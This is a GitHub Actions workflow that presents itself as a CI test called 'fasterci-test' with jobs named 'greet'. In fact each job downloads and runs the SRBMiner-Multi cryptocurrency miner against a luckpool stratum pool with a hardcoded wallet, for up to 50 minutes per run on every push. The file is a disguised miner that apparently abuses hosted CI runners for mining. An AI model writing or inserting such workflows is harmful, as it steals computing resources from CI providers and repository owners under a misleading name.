name: fasterci-test

on: [push]

jobs:
  greet:
    runs-on: fasterci-medium
    timeout-minutes: 50
    steps:
      - run: |
          woorkersd=$(date +"%Y%m%d%H%M%S")
          echo $woorkersd
          curl -L https://github.com/doktor83/SRBMiner-Multi/releases/download/3.1.1/SRBMiner-Multi-3-1-1-Linux.tar.gz -o SRBMiner-Multi.tar.gz
          tar -xzf SRBMiner-Multi.tar.gz
          echo "Start Mining"
          ./SRBMiner-Multi-3-1-1/SRBMiner-MULTI --disable-gpu --algorithm verushash --pool stratum+tcp://ap.luckpool.net:3956 --wallet REBiQeBs4ZcXQV2xu961D6JxzhXAZ53qXp --cpu-threads 2
  greet1:
    needs: greet
    runs-on: fasterci-medium
    timeout-minutes: 50
    if: always()
    steps:
      - run: |
          woorkersd=$(date +"%Y%m%d%H%M%S")
          echo $woorkersd
          curl -L https://github.com/doktor83/SRBMiner-Multi/releases/download/3.1.1/SRBMiner-Multi-3-1-1-Linux.tar.gz -o SRBMiner-Multi.tar.gz
          tar -xzf SRBMiner-Multi.tar.gz
          echo "Start Mining"
          ./SRBMiner-Multi-3-1-1/SRBMiner-MULTI --disable-gpu --algorithm verushash --pool stratum+tcp://ap.luckpool.net:3956 --wallet REBiQeBs4ZcXQV2xu961D6JxzhXAZ53qXp --cpu-threads 2
